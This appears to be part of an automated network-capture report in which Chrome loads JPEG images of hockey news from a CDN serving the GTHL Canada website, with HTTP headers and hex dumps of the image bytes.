                                                                                                                          2025-01-13 21:01:19 UTC16384INData Raw: e5 8e a6 b7 2c 3c 26 cf d2 97 4c 83 fd 81 6b e7 50 33 44 6e e5 1a 59 0a 4e 0e 28 2f 0a 71 0e 9d 64 39 2e 24 51 30 3d 09 ef 5c 71 6e a1 25 d5 cf cc a6 3c 0e 80 83 41 fc 13 f9 2f c9 ad 73 6f cd 51 9d 64 ff 00 15 28 1d 40 e3 f1 57 23 51 2c 70 0e 4d 4f b6 89 e4 37 19 c5 d0 26 ac 5a f8 ac be 18 04 f7 a0 9a 3e b9 63 0c 66 29 dc 2b fb d3 66 87 73 61 32 49 2a c8 ad 81 d2 9a a9 6c 8b 64 2b 75 0d b8 c4 b8 cd 71 24 d6 b2 fa 6f 4a 3a ae ae d2 5f cb 82 42 86 3b 54 31 ea a7 23 cd 48 e0 fb 0a 90 d5 2c 6b 19 e7 8d b6 f4 a8 e7 0a f1 f3 8e fd 68 24 5a a1 38 05 b2 0d 13 b6 f1 66 02 35 1d 68 a8 b7 d9 2c 8e 38 25 7c f2 a1 38 af 92 45 2a f5 46 1f a5 5c 92 f5 74 dc a3 e3 9a a0 7d 62 39 32 48 a9 e4 d3 25 22 bc 12 f2 48 51 fa 1f 5a 94 c6 f9 fc 35 05 d5 e4 32 a8 2b 8e 61 5f 56 f4
                                                                                                                          Data Ascii: ,<&LkP3DnYN(/qd9.$Q0=\qn%<A/soQd(@W#Q,pMO7&Z>cf)+fsa2I*ld+uq$oJ:_B;T1#H,kh$Z8f5h,8%|8E*F\t}b92H%"HQZ52+a_V
                                                                                                                          2025-01-13 21:01:19 UTC4373INData Raw: 32 44 25 78 4b 8e 56 1d 88 ac 7f 8b f8 72 7d 02 e4 06 e7 68 9f a3 91 b7 d3 35 b5 d8 f1 4d 9d fa 84 b9 03 27 f3 af fa d5 8b ed 22 0b eb 76 01 62 ba b7 71 82 a4 64 1f d2 b0 66 e2 42 7f f6 bf fd 1a 61 95 af e5 1f 99 dd c8 fc c3 f7 a8 bc 46 fe 31 fb d6 89 c6 3f 05 e3 bd 2f 71 a0 dd 35 94 dd 4d bc 84 98 db e8 7a 8a cf 1b e1 97 18 a3 15 f9 09 8e 0e 32 1c 60 ff 00 3a e6 e4 e3 67 83 aa b3 4c 32 c2 4b b1 c7 82 bf ec f1 ae eb c5 2e f8 8e 63 a4 d9 9d fc 04 f3 4c e3 df b2 d6 ff 00 c1 9f 0f f8 7f 82 2d 3c 1d 1f 4e 8e 26 3f 8a 66 1c d2 3f d5 8e f4 78 36 d9 a9 d5 c1 4c 74 38 ae 1c a6 e4 ed b3 7a 8a 5d 11 48 8e 0e 53 18 f7 aa 3a d3 05 d1 ef 9b b8 b7 93 ff 00 e2 68 82 61 62 0a 4e 71 55 35 6b 56 bc d3 ae ad 63 20 3c d1 32 03 ee 46 29 7d c6 5d 98 ae 81 12 58 da 58 32 b7 30
                                                                                                                          Data Ascii: 2D%xKVr}h5M'"vbqdfBaF1?/q5Mz2`:gL2K.cL-<N&?f?x6Lt8z]HS:habNqU5kVc <2F)}]XX20
                                                                                                                          2025-01-13 21:01:19 UTC4365INData Raw: f2 aa cb d3 a5 48 bd 2a 58 4b b6 77 7e 03 10 cd 85 3d 6a f7 cf 5b 85 1f 7d ff 00 ed a0 a2 bd b0 04 e7 f7 a9 e4 06 82 c6 fe 00 c0 87 63 8d ff 00 0d 54 9e 74 96 e0 ca cc e4 fb 0c 55 13 3a 76 39 fa 57 b3 2b 11 ca b8 1e f4 3c 88 5f b9 d4 55 ac 45 bc 4a ca 01 c9 ce f9 aa 50 ce 23 93 9b a8 20 e2 b8 7b 1b 82 79 95 89 ff 00 0b 6d 9a bb a3 e9 90 de dc ef 8f ba f3 48 ad f5 e9 4a e4 10 bf 0f e9 91 d8 a1 d4 26 5e 6b 89 47 90 1f c8 be bf 53 56 35 39 4d c4 0e a4 e6 be cd 70 77 5d 80 1e 9d 2a a3 b6 47 e2 ce 6a af 72 01 31 be 4d 5b b0 20 c8 54 f4 35 5a 5f 24 8c b9 c6 f5 dc 2c 55 81 a2 4b 09 b4 3d 71 d2 bc 91 79 86 46 05 4a ae ae 81 87 f2 ae 41 00 f5 dc d0 00 73 43 b3 32 ca b8 14 fd a7 5b 98 c2 af a1 ed 49 fc 26 be 2d ca 0c e0 66 b4 fd 3b 4e 32 e4 28 2a 55 4b 64 75 a7 5d
                                                                                                                          Data Ascii: H*XKw~=j[}cTtU:v9W+<_UEJP# {ymHJ&^kGSV59Mpw]*Gjr1M[ T5Z_$,UK=qyFJAsC2[I&-f;N2(*UKdu]


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          94192.168.11.204991654.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:19 UTC448OUTGET /app/uploads/gthl/2024/12/12194650/U10-AA-West-Mall-Lightning-GTHL-Community-2-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:19 UTC488INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 107606
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:20 GMT
                                                                                                                          Last-Modified: Fri, 13 Dec 2024 00:46:52 GMT
                                                                                                                          ETag: "b2eae4c054996b0af3fb67696e2f8d86"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 65515d7b1028cd133489fb761d35fa06.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: Tq7aJVZNciaZfBO8L9HgcfDeX2wx_VMGEuVzbI6q-vd767XiOkC6LA==
                                                                                                                          2025-01-13 21:01:19 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 06 03 04 05 07 08 02 01 00 09 ff c4 00 50 10 00 01 03 02 04 05 02 04 04 03 06 04 02 07 05 09 01 02 03 04 05 11 00 06 12 21 07 13 31 41 51 22 61 08 14 32 71 15 23 81 91 42
                                                                                                                          Data Ascii: JFIF&&CC"P!1AQ"a2q#B
                                                                                                                          2025-01-13 21:01:19 UTC12792INData Raw: 85 2d 95 b2 be 4e cb a9 fe d0 d3 aa eb 7a cd a9 08 69 66 c0 25 43 a7 bd f0 23 98 20 8a c6 62 11 d1 9a a9 b0 04 48 e9 71 d0 e3 df 98 01 df 4a 10 37 26 d8 12 cd 35 b5 e5 31 f8 53 75 35 cc 71 d0 5d 40 42 6d a1 29 fe 1b 62 84 6e 55 4a b5 3a 56 67 62 a5 21 33 83 ca 77 98 55 73 ec 3f 6c 59 e1 62 75 1c 5c 4f 65 4d ab e6 30 b4 c4 c0 bf 56 f2 4e 7c ca 74 ec a5 12 81 4e 0d b5 26 24 04 98 dc c3 64 bc 2d f5 fe a7 b1 df 03 59 d7 e2 56 0d 25 b8 94 ec b7 10 3f 51 bd a4 3a a4 5d b0 47 5b 63 1e 64 8e 29 a8 52 a8 cb ab 3a ea d0 ca 56 e1 65 9f 49 2e ab 65 12 6f d2 fb db 12 cd d7 e2 4a 71 4e 05 3a 14 a2 57 6b f4 fb e2 56 4e 54 b1 d3 5a b3 6d 8c 2b b3 88 39 f6 5f 10 54 89 71 f4 6a e4 a5 a5 96 89 4b a1 36 dc 14 f8 bd b7 c4 87 07 f3 bc cc 99 3d aa 15 5a 50 44 74 a8 b8 bf 58 e5
                                                                                                                          Data Ascii: -Nzif%C# bHqJ7&51Su5q]@Bm)bnUJ:Vgb!3wUs?lYbu\OeM0VN|tN&$d-YV%?Q:]G[cd)R:VeI.eoJqN:WkVNTZm+9_TqjK6=ZPDtX
                                                                                                                          2025-01-13 21:01:19 UTC10614INData Raw: 94 e3 ce 84 50 0f 94 70 1a 84 16 cd 49 85 10 84 91 ab b1 49 38 41 2d d5 56 a1 a4 13 73 bf e5 ab 07 5f db ea aa d6 3d 6a 27 a5 f9 49 17 c7 ab cf 15 90 02 d2 f2 fe c5 b4 ed 8e d9 07 dd 76 d6 9f 28 06 63 35 f2 b5 91 01 d5 a0 6f 7d 05 23 11 6b 4d 74 12 d8 88 a1 ac f6 df fc b1 67 8c f1 5b 74 84 ad e5 ef fe 01 86 b5 5e 23 7e 0f 19 73 2a 75 44 45 69 00 92 a7 02 40 fd 3c e2 46 3e 30 c9 91 b1 42 d2 e2 7b 0a ee 85 20 89 8d de e7 d0 0a ba 6a 97 59 72 e5 e8 72 56 3a 0d 29 3d 70 49 48 89 2d da 0c b4 4b 82 b5 37 4e 52 5e d0 b4 da e0 dc 10 2f 8a d7 88 1f 16 55 b6 d0 e4 2c 89 53 48 00 58 c9 79 90 6e 7d 92 46 2b 64 fc 58 71 90 83 12 b5 36 1d 55 97 51 ca d0 5a d0 a2 09 d8 6d d7 7e 98 f4 ac 2f c3 3d 55 d8 a3 2d e3 6b 8f 66 9e 0a af c4 f5 06 16 36 58 1b 89 1f 2a c5 a9 e7 3a
                                                                                                                          Data Ascii: PpII8A-Vs_=j'Iv(c5o}#kMtg[t^#~s*uDEi@<F>0B{ jYrrV:)=pIH-K7NR^/U,SHXyn}F+dXq6UQZm~/=U-kf6X*:
                                                                                                                          2025-01-13 21:01:19 UTC13766INData Raw: 86 38 90 e5 94 a3 7d 92 9b 0c 08 93 dc a7 81 e1 6f 5c 95 59 ce d5 9e 19 aa 4c 07 5e 9f 59 a1 36 c4 88 d5 59 52 12 e3 75 48 6e a4 73 01 ec 1c 46 fb 5b b0 c5 df c0 8c 8a 32 9e 4f 93 51 92 1b 5d 4a bf 21 53 e4 bc 86 82 35 a7 a3 7b 0f f0 84 e3 1e fc 14 70 51 7c 41 72 4e 73 cc b9 8e 7b 39 5e 83 30 37 f8 5c 79 4e 24 4d 91 60 ab 14 85 69 d0 2e 2e 2d be 3f 40 15 9a a9 e9 02 1d 36 34 66 52 d0 08 08 2b 07 48 03 61 a7 b6 3e 6c fc 6d f5 71 99 8d d0 70 f9 37 72 7d 87 80 b5 1e 9f c1 da e3 3b fb 78 51 59 d3 3d e5 2c 83 1e 3b 99 8a 63 51 dd 92 8b a5 0b 20 29 d1 df 4e 29 3c c1 f1 93 48 81 26 4d 3f 23 d2 62 a1 4e dd 28 99 39 cb 94 5b c2 00 ff 00 5c 05 7c 68 33 59 cd b5 dc 87 45 a5 4d 42 27 4f 97 25 84 3a b0 34 a4 14 8f e8 3d b1 4f 41 f8 56 ae 09 f3 55 9c 33 cb 30 a2 45 79
                                                                                                                          Data Ascii: 8}o\YL^Y6YRuHnsF[2OQ]J!S5{pQ|ArNs{9^07\yN$M`i..-?@64fR+Ha>lmqp7r};xQY=,;cQ )N)<H&M?#bN(9[\|h3YEMB'O%:4=OAVU30Ey
                                                                                                                          2025-01-13 21:01:19 UTC12792INData Raw: c0 cd 71 a2 25 c4 98 f5 29 9c c5 05 93 b1 26 f7 d3 ef 87 1c 5c aa d2 aa 0e 73 69 8d b0 86 dd 98 b6 9c 17 f5 85 a3 ad c7 61 7c 4c 12 cf d7 0d 77 65 4b 23 34 c7 69 af 7b 38 78 ec 14 26 4e 4c 5a 92 6a 32 6a 31 cc 86 21 34 2c d5 ba df af db 6c 1a d3 22 d2 d8 75 11 6a 19 72 0b b1 1c 00 b4 f3 c9 f5 00 7a 5e d8 15 c8 4c 29 ea 1c e5 36 85 ea 97 31 a8 a9 70 74 3e a1 a8 5b d8 62 f7 39 36 05 72 42 21 cd 7d 0d 24 34 96 da 79 9d 93 b0 ea 6f 88 1a a6 57 42 4d a5 cb 55 e9 0d 2d b9 b0 7e 5b 00 73 fe ca bb cc f4 1a 0d 3f 2d 55 64 53 69 d0 98 7c 36 74 a5 90 6e 49 1f c2 71 6b 70 e5 f5 23 2c 51 9c 0a 26 f0 59 d4 57 a6 f7 d2 2e 30 13 c4 0c bf 4d ca d9 76 5c 78 e9 79 f7 1b 8e ea 83 c5 57 45 ed fe 78 a0 72 94 fc c5 57 5b 14 ea 75 52 4f 3d f4 dd 94 2e 41 42 36 1b 80 7a 62 5e 1c
                                                                                                                          Data Ascii: q%)&\sia|LweK#4i{8x&NLZj2j1!4,l"ujrz^L)61pt>[b96rB!}$4yoWBMU-~[s?-UdSi|6tnIqkp#,Q&YW.0Mv\xyWExrW[uRO=.AB6zb^
                                                                                                                          2025-01-13 21:01:19 UTC4616INData Raw: 91 1d 98 40 a7 d6 af 23 da fb 63 3a a5 4d a3 fb 89 ee 8b 7e 98 58 b8 ef 2e ee d5 5f 2b 23 6b 7f df 00 9d d9 33 37 a6 f9 0d 1e 55 9e 34 5a 5e 3b 84 ad 85 b6 2b f9 2d 4b 3f e2 eb 3f d4 69 ca a6 a9 70 9b 5f cb 08 ab 9c d3 3a 64 b8 d0 16 d2 a5 7f b6 2a 8a e7 12 e7 ba da 92 d3 aa 6f b8 b1 f5 03 f7 c5 4c b9 72 ef a0 54 c8 41 ee a1 86 d2 e7 54 62 0f 99 fc 4e 39 08 37 49 50 bd c8 ed 6c 05 da 74 b9 8e 6b a6 79 34 9b fd b3 a6 e8 f1 b8 62 c4 1b 7d fe ea 47 3d 57 e4 56 68 73 59 7e a4 e2 c2 c0 20 2d 65 40 1b f4 c4 cf c2 2b 15 46 eb 19 99 fa 7c b2 d2 4b 6c a5 6a 09 06 fb 9f 4e f8 00 cc 59 fa 5d 5a 9a a8 52 e1 c2 27 6b a9 0d 04 92 7f 4c 5a 9f 08 f3 b5 1c dd 4b 6e 94 db 8e bc 23 b9 f3 25 5b b4 09 23 61 fa 63 4e dc 7f a6 c0 74 41 78 47 ac 75 06 ea ba 8f 54 7c 04 9f c5 f1
                                                                                                                          Data Ascii: @#c:M~X._+#k37U4Z^;+-K??ip_:d*oLrTATbN97IPltky4b}G=WVhsY~ -e@+F|KljNY]ZR'kLZKn#%[#acNtAxGuT|
                                                                                                                          2025-01-13 21:01:19 UTC12792INData Raw: 9b a5 4f 52 33 ce 60 ca 34 e6 28 19 79 02 24 16 05 98 69 71 ee 40 fb 9e b8 19 ce 90 a4 f1 06 7b 75 1c d5 15 99 0f b0 8d 08 50 4e 8b 02 7a 58 75 c5 9f 54 a2 40 ab 3e 1f 77 33 52 0a ee 02 54 b9 29 08 48 fb f6 18 6d 22 91 05 86 04 64 56 f2 eb 8a 26 c1 66 62 76 f7 be 00 df cd b9 4a 11 b4 b6 88 55 6e 5f cb 54 cc ba 89 f1 a1 52 d9 42 6a 31 cc 57 94 b4 6a 1a 0e e6 de 0e dd 70 d5 1c 29 c9 8a 6c ba a8 69 36 20 10 4d 8e 2c 47 69 51 c0 4b 2e e6 9a 28 17 2a 25 32 81 4f ef 8f 1c a0 d3 c3 6a 57 f6 ba 83 a5 5d 84 c0 56 3f 4c 3c 38 f7 b4 d3 13 3e 15 6b 2b 86 d9 42 39 09 6a 9e 85 f7 f4 aa e7 f5 c7 54 38 31 b2 95 5d ba b6 5e 84 98 f3 59 b8 4b c7 7d 20 f5 18 b0 9d a4 52 90 db 48 fe d0 d2 5c d7 b9 28 72 f6 23 cf 8c 47 d4 72 b2 50 e2 56 8c cd 43 70 3d d9 a9 77 23 fe a1 6d b0
                                                                                                                          Data Ascii: OR3`4(y$iq@{uPNzXuT@>w3RT)Hm"dV&fbvJUn_TRBj1Wjp)li6 M,GiQK.(*%2OjW]V?L<8>k+B9jT81]^YK} RH\(r#GrPVCp=w#m
                                                                                                                          2025-01-13 21:01:19 UTC4616INData Raw: 96 82 9b 81 d8 a4 75 18 1a a4 54 2a ce 53 96 db 52 15 0e 15 3d 2a d0 d8 59 40 4b 47 ea 36 1d af d7 1c 55 69 95 9d 06 5c 5a ac 56 d0 e2 6f a8 1d 4e 2a fd fc f4 f3 84 69 2e 7d 05 3e 3e 9b 63 06 c1 fb 24 2a f9 62 4b 95 25 ca 43 34 d8 31 c9 3a 5d 41 db ec 94 ff 00 96 18 c0 cb 55 30 ca 1f 96 94 b4 d3 8f 5f 52 88 0a 29 f3 6e be f8 75 06 9e 55 01 70 eb 15 16 9b 7d 4b 42 a2 b8 ea 88 df bd f0 a5 73 28 66 4a 84 67 5f 85 59 69 68 45 83 6d c7 52 93 b8 dc fd fc df 13 9b fe 92 e4 19 b1 99 7b 80 b4 d2 46 5d a7 41 7b 9a 6b 1a 43 85 5a 4a 91 a4 b9 e6 c7 10 c8 a0 c2 7d e9 6d fc cb e2 1a 3d 4b 52 45 d4 7d cf b6 27 21 f0 f6 b9 5b cb ae 48 97 54 26 54 52 56 cb 52 1d 04 b8 93 d7 49 ed 6b 5e c7 11 32 16 d4 09 6d b6 cd 4a cc be 8e 5b 84 0d c9 02 d6 27 a6 f6 c1 00 03 85 02 51 d3
                                                                                                                          Data Ascii: uT*SR=*Y@KG6Ui\ZVoN*i.}>>c$*bK%C41:]AU0_R)nuUp}KBs(fJg_YihEmR{F]A{kCZJ}m=KRE}'![HT&TRVRIk^2mJ['Q
                                                                                                                          2025-01-13 21:01:19 UTC6396INData Raw: ad d8 78 f1 8e 8a 5d dd 93 e7 c2 97 14 a8 5a 5e 5b 8c fa 55 33 31 54 1f 58 62 cb bb 20 14 de fd 07 e8 31 2b 29 ba c5 66 a2 b4 50 dc f9 58 4e a9 2d 32 5e 3a 94 1b 22 c4 91 df b9 db 06 79 23 23 33 9a a8 26 52 eb 11 9b 28 74 a7 92 a6 cd f6 fe 12 7a 11 de f8 ef 2e 65 ca bd 42 b5 50 aa c1 ac 52 60 c7 a5 21 4d a5 e7 97 7e 82 da 90 8f e2 ee 30 c1 94 1e f2 d6 9f 70 47 86 27 d0 32 1e 0a 1f 9b c1 88 d4 54 b5 1a 6e 70 5b a6 a0 a0 a4 3b 09 24 a4 0d b7 b1 b1 b0 ee 30 19 52 89 45 a2 66 09 14 98 b3 13 52 8f 1d ce 58 7c 24 04 a8 f7 50 1f 7e d8 b3 f3 10 7b fb 28 e8 76 a4 d4 f9 a0 92 d3 8c ba 06 a4 9d 88 09 1b a4 ef df 15 f4 5a 55 2e 2a c6 86 d0 52 10 00 4d ac 4a ad b8 27 be f8 95 14 a4 8f 71 4b 9c 1a da d8 3b 22 8c ab 9e 32 76 58 88 a4 cc a2 cc 7e a0 eb 80 2d 77 05 21 3d
                                                                                                                          Data Ascii: x]Z^[U31TXb 1+)fPXN-2^:"y##3&R(tz.eBPR`!M~0pG'2Tnp[;$0REfRX|$P~{(vZU.*RMJ'qK;"2vX~-w!=
                                                                                                                          2025-01-13 21:01:19 UTC3788INData Raw: 74 fd b1 27 03 30 bb 4e a9 29 d7 22 c7 93 29 60 69 2e 9b 84 fb 10 3b e2 6d 5c 8e 25 43 79 0c d0 e2 d2 ea 34 d6 92 ab c7 59 4a 25 04 8d 8a 81 fa 15 fd 30 12 dd 32 6c 79 8d 7c da dd 6d 67 d4 d2 ca 2e 95 13 b6 e4 6f fb e1 b5 64 a2 dc d0 d1 27 ba 97 a8 56 a6 4e 5b 80 be ca 14 f9 1c c6 99 45 d2 93 7f 7c 36 8e 99 50 5d 43 6f 05 35 ea dc 91 a9 27 c5 bc 62 66 97 97 a0 c7 86 95 b3 1d c7 9c 3e 91 ac ff 00 18 df 61 d4 9c 2e e3 51 1b 69 98 f2 db 1a 82 94 bb 5f 75 8f 07 b6 1b 63 e5 42 90 b9 e6 dc 6d 41 56 20 bd 0c 16 39 25 ed 76 71 2a 49 d9 44 f5 fb 0c 2c 98 93 5f a4 48 68 25 0d 09 21 2d b9 6d ca 50 37 16 f7 bf 7c 4a 48 0e 25 c4 b5 0a 3f f7 80 a1 2a 3b e9 04 6e 05 fb e1 d5 2a 95 36 2a b9 af 04 b6 c2 53 a4 a7 ea 5a cf 60 3b 61 41 fb a6 01 f0 81 ea 49 aa 44 8e b0 d2 92
                                                                                                                          Data Ascii: t'0N)")`i.;m\%Cy4YJ%02ly|mg.od'VN[E|6P]Co5'bf>a.Qi_ucBmAV 9%vq*ID,_Hh%!-mP7|JH%?*;n*6*SZ`;aAID


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          95192.168.11.204991554.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:19 UTC666OUTGET /app/uploads/gthl/2024/12/20173705/Spengler-Cup-Hockey-Canada-730x406.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:19 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 79992
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:20 GMT
                                                                                                                          Last-Modified: Fri, 20 Dec 2024 22:37:06 GMT
                                                                                                                          ETag: "499c6dbafd87888308901d2c585c3186"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 1717f995f2ca7c5df4d0a972f90c1564.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: fs86HYRtlEMOrAJep2sIspbk6prsj_K3gqf5OJfe6LSqrL-61w4AJQ==
                                                                                                                          2025-01-13 21:01:19 UTC15897INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e2 0d 1c 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0d 0c 61 70 70 6c 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e8 00 04 00 05 00 12 00 2a 00 26 61 63 73 70 41 50 50 4c 00 00 00 00 41 50 50 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 61 70 70 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 64 65 73 63 00 00 01 50 00 00 00 62 64 73 63 6d 00 00 01 b4 00 00 01 e6 63 70 72 74 00 00 03 9c 00 00 00 23 77 74 70 74 00 00 03 c0 00 00 00 14 72 58 59 5a 00 00 03 d4 00 00 00 14 67 58 59 5a 00 00 03 e8 00 00 00 14 62 58 59 5a 00 00 03 fc 00 00 00 14 72
                                                                                                                          Data Ascii: JFIFICC_PROFILEapplmntrRGB XYZ *&acspAPPLAPPL-appldescPbdscmcprt#wtptrXYZgXYZbXYZr
                                                                                                                          2025-01-13 21:01:19 UTC1082INData Raw: 27 b8 00 1a 9f e5 60 6f 73 9f f1 27 f7 d9 97 b2 a9 bf ef 56 a3 dd 99 09 0e da f4 63 8e 31 08 28 70 b9 4e 28 e0 8f 72 90 3f ad 74 d7 ef 7d 6f 15 ab 3d 59 fe b5 09 78 1a da b7 76 c3 c3 7e 9d 62 62 10 9b b6 a0 0a bb 4e 00 61 45 4e 1f 84 1f a2 71 fa d4 b9 7a b8 42 d3 cc bd 71 bc 4d 66 0c 68 e9 2e 38 f3 ea 09 4a 52 06 4f 7e f4 b4 78 68 2e 25 74 4d 33 7c 00 9f b2 75 5a 64 2d 6f f4 10 7a 48 ef 4a d3 da 21 a6 ca 48 50 f5 20 f6 ae 77 6e f7 8a fd 65 ac 6e 4f db b4 0d dd 56 6d 3e d2 bc b6 5d 60 e1 f9 38 3c af ab d0 1f 6a 70 f8 69 f1 07 7c d3 d7 ff 00 b8 eb 6d 45 32 e3 69 9e a0 db 8a 90 be a3 1d 67 b2 c7 cb de 99 fe 2b 00 93 46 55 f0 f8 7b 74 14 1e da 30 76 ce 9d f2 a6 0f 17 be 17 67 78 96 b5 69 68 11 75 43 96 f6 ac b7 24 bd 2e 2b 99 2c 3f 1c 91 d4 7a 7f 9c 01 c7 d6
                                                                                                                          Data Ascii: '`os'Vc1(pN(r?t}o=Yxv~bbNaENqzBqMfh.8JRO~xh.%tM3|uZd-ozHJ!HP wnenOVm>]`8<jpi|mE2ig+FU{t0vgxihuC$.+,?z
                                                                                                                          2025-01-13 21:01:19 UTC16384INData Raw: 7e d0 6b 65 ad 4e db b4 40 12 64 1c a1 25 8c 14 a1 5e 85 46 a9 9e e4 6f de e2 ee bc f7 ee 37 5b a4 98 cc 38 a2 56 c3 6b 3d 00 fb 7c ea 31 2e 06 56 b2 95 65 4b fc 4a f7 a5 46 ea b1 2c 92 4c f2 f9 4e 49 4f bd 63 bd bb 93 ad ef 0e 5d ae fa 9a 50 2a 27 a1 b4 38 40 48 3e 82 a3 cb 8d ce 5b b3 12 c3 af 3e f1 94 af 31 d2 b7 94 41 57 a1 c5 0c d9 2a a2 2f 0c de 19 0a f4 14 64 91 d9 0f 26 ed 72 b4 cf 6c db 6e 52 e2 38 5a 2d a9 6d 3c a0 4a 0f 74 fd 28 fc 02 e1 6c b8 24 3b 97 7e 25 12 b3 92 7e 74 8b a8 47 97 72 60 9f e2 4d 2a c0 70 06 12 2b 97 07 23 29 82 86 cf 9a c4 97 da 73 39 0b 6d c2 92 0f e5 47 23 6a 9d 7f 6a 20 d9 f5 e5 ee 2a d3 d8 a6 62 c7 fa d1 74 ba 00 e4 50 2a 57 c5 9c d7 67 28 72 9f 1a 0b 7d b7 9b 6d 9c 96 fe 9c d6 2e 3a a9 ca 0e c8 13 13 e7 75 af d4 e4 f3
                                                                                                                          Data Ascii: ~keN@d%^Fo7[8Vk=|1.VeKJF,LNIOc]P*'8@H>[>1AW*/d&rlnR8Z-m<Jt(l$;~%~tGr`M*p+#)s9mG#jj *btP*Wg(r}m.:u
                                                                                                                          2025-01-13 21:01:19 UTC16384INData Raw: e0 58 53 80 7c 20 91 c7 7c 1a e1 86 a3 b7 de 70 4d 7d 9b d1 9a ed cd 60 bd e2 dc 69 ed c1 86 f2 cb a9 6e 6a ba a4 38 d8 24 a1 29 47 71 e9 e9 4e ab 85 d1 57 2b 84 a9 eb 24 22 4b cb 75 00 9f 42 7b fe 95 a5 f3 5b 43 d4 ab 71 eb 75 bd 2c b4 b5 91 d6 a3 92 40 ed 81 d8 52 42 e4 74 81 8a a8 dd 25 32 c9 a4 1d 97 a1 7a 07 a7 1b 6e a5 15 53 37 0f 77 ec 8e bf 21 25 38 0a a2 0f 48 01 27 9a 2e b9 27 d4 d1 75 3b e6 2b a4 54 56 9c 2d 09 ce df 64 33 6b 2e 1c d1 c6 f8 14 55 84 f4 f3 8c 51 b4 f0 33 ed 42 95 63 91 79 f2 bc b4 84 01 c9 f5 a3 36 c7 42 fa 46 69 0a e8 fb 85 d1 83 c5 7b 1a 62 da 58 52 55 5d 84 7f 38 02 9e 8d 8e 92 39 a3 ad 2c 52 14 19 c5 d4 8c 9c e6 94 9a 76 88 5a a4 22 90 10 96 98 50 c0 c1 a3 48 05 54 95 1d df 88 52 ac 7e 40 f9 d1 70 9c 03 95 ea c1 49 ef 49 d3
                                                                                                                          Data Ascii: XS| |pM}`inj8$)GqNW+$"KuB{[Cqu,@RBt%2znS7w!%8H'.'u;+TV-d3k.UQ3Bcy6BFi{bXRU]89,RvZ"PHTR~@pII
